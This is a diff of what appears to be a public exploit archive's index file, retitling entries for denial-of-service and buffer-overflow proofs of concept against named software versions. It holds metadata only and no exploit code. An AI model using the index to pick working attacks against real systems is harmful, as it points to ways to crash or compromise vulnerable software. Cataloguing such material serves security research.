@@ id,file,description,date,author,platform,type,port 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - ASCII-ART Game Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0 -1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 +1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - '.Midi' File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 1937,platforms/multiple/dos/1937.html,"Opera 9 - long href Remote Denial of Service",2006-06-21,N9,multiple,dos,0 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - 'do_hook()' Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0 @@ -382,7 +382,7 @@ id,file,description,date,author,platform,type,port 2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,windows,dos,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - IE Plugin Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,windows,dos,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos,0 -2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 +2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,nop,windows,dos,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - FTP Request Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",windows,dos,0 @@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - 'USER/PASS' Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - 'LIST/NLST' Denial of Service",2006-12-13,shinnai,windows,dos,0 -2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 +2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - DLL-load Hijacking Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos,0 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 @@ -465,7 +465,7 @@ id,file,description,date,author,platform,type,port 3078,platforms/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service",2007-01-04,nitr0us,windows,dos,0 3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast - XML Title Remote Format String (PoC)",2007-01-04,MoAB,osx,dos,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0 -3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 +3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption",2007-01-08,posidron,multiple,dos,0 3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 @@ -562,8 +562,8 @@ id,file,description,date,author,platform,type,port 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Denial of Service Vulnerabilities",2007-05-02,shinnai,windows,dos,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos,0 3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Denial of Service Vulnerabilities",2007-05-04,shinnai,windows,dos,0 -3851,platforms/multiple/dos/3851.c,"ZOO - .ZOO File Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,multiple,dos,0 -3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 +3851,platforms/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,multiple,dos,0 +3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 3871,platforms/multiple/dos/3871.html,"Opera 9.10 - 'alert()' Remote Denial of Service",2007-05-08,Dj7xpl,multiple,dos,0 3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - 'scvncctrl.dll' Denial of Service",2007-05-08,shinnai,windows,dos,0 3883,platforms/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos,0 @@ -815,7 +815,7 @@ id,file,description,date,author,platform,type,port 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 -6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 +6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service",2008-10-03,dmnt,windows,dos,0 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - '.GIF' Image Local Crash",2008-10-04,suN8Hclf,windows,dos,0 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos,0 @@ -854,7 +854,7 @@ id,file,description,date,author,platform,type,port 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - 'ISAPI' Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)",2008-11-15,r0ut3r,windows,dos,0 -7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0 +7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (Add RSS Subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0 7178,platforms/windows/dos/7178.txt,"BitDefender - Module pdf.xmd Infinite Loop Denial of Service (PoC)",2008-11-20,ProTeuS,windows,dos,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 - '.m3u' Playlist File Remote Buffer Overflow (PoC)",2008-11-24,LiquidWorm,windows,dos,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser - URL Bar Remote Stack Overflow (PoC)",2008-11-24,r0ut3r,windows,dos,0 @@ -863,7 +863,7 @@ id,file,description,date,author,platform,type,port 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP - Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos,0 7226,platforms/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - wscanf Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0 -7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 +7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator 'SIP' Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflows (PoC)",2008-11-30,"laurent gaffié",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 @@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port 7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0 -7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (Heap Spray)",2009-01-05,Skylined,multiple,dos,0 +7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow HeapSpray (PoC)",2009-01-05,Skylined,multiple,dos,0 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - 'user' Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0 @@ -927,7 +927,7 @@ id,file,description,date,author,platform,type,port 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 -7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 +7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser",2009-01-28,"Core Security",windows,dos,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0 7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0 @@ -962,7 +962,7 @@ id,file,description,date,author,platform,type,port 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0 8212,platforms/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 -8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 +8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0 8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)",2009-03-16,Encrypt3d.M!nd,windows,dos,0 @@ -1116,7 +1116,7 @@ id,file,description,date,author,platform,type,port 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0 9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 -9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 +9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - 'RTSP' / 'SETUP' Request Handler",2009-07-17,"Core Security",multiple,dos,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - 'pecoff' Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 @@ -1162,7 +1162,7 @@ id,file,description,date,author,platform,type,port 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 -9478,platforms/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80 +9478,platforms/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service",2007-06-21,Prili,windows,dos,80 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0 9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-24,hack4love,windows,dos,0 9496,platforms/windows/dos/9496.txt,"War-FTPD 1.65 - MKD/CD Requests Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 @@ -1186,7 +1186,7 @@ id,file,description,date,author,platform,type,port 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service",2009-09-04,kingcope,windows,dos,0 9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0 -9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0 +9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0 @@ -1195,7 +1195,7 @@ id,file,description,date,author,platform,type,port 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,windows,dos,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,hardware,dos,0 -9657,platforms/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 +9657,platforms/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - using tel: Remote Crash",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 @@ -1339,14 +1339,14 @@ id,file,description,date,author,platform,type,port 11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,windows,dos,0 11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) - Local Denial of Service",2010-01-13,"Rehan Ahmed",windows,dos,0 11133,platforms/windows/dos/11133.pl,"NPlayer - '.dat Skin' Local Heap Overflow (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 -11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc)",2010-01-15,Dr_IDE,multiple,dos,0 +11142,platforms/multiple/dos/11142.txt,"Multiple Media Players ((iTunes / QuickTime) - HTTP DataHandler Overflow",2010-01-15,Dr_IDE,multiple,dos,0 11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - Overwrite (SEH) (PoC)",2010-01-15,Darkb0x,windows,dos,0 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0/2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,windows,dos,0 11165,platforms/windows/dos/11165.pl,"MediaMonkey 3.2.0 - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos,0 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,dos,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,windows,dos,0 -11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 +11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service",2010-01-18,"Mert SARICA",windows,dos,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0 11192,platforms/windows/dos/11192.txt,"OpenOffice - '.slk' Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow (PoC)",2010-01-19,SarBoT511,windows,dos,0 @@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port 11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0 11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0 -11529,platforms/multiple/dos/11529.txt,"Adobe (Multiple Products) - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 +11529,platforms/multiple/dos/11529.txt,"Adobe (Multiple Products) - XML External Entity / XML Injection",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 - 'Browser' IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0 11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - ISO Compilation Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 @@ -1428,7 +1428,7 @@ id,file,description,date,author,platform,type,port 11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 -11717,platforms/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 +11717,platforms/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service",2010-03-13,"Yakir Wizman",multiple,dos,0 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,windows,dos,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,windows,dos,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 @@ -1498,7 +1498,7 @@ id,file,description,date,author,platform,type,port 12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - '.bkd' Local Denial of Service",2010-04-14,anonymous,windows,dos,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 -12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 +12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0 @@ -1534,7 +1534,7 @@ id,file,description,date,author,platform,type,port 12508,platforms/osx/dos/12508.html,"Multiple Browsers - 'history.go()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0 12509,platforms/osx/dos/12509.html,"Multiple Browsers - 'window.print()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0 -12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0 +12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0 12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Authentication Bypass",2010-05-07,Ra3cH,asp,dos,0 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 @@ -2160,7 +2160,7 @@ id,file,description,date,author,platform,type,port 18629,platforms/windows/dos/18629.py,"Tiny Server 1.1.9 - HEAD Denial of Service",2012-03-20,"brock haun",windows,dos,0 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote Denial of Service",2012-03-20,G13,android,dos,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - '.tiff' Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 -18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 +18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 @@ -2172,7 +2172,7 @@ id,file,description,date,author,platform,type,port 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 -18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0 +18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - '.M3U'/'.PLS'/'.LST' Playlist File Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0 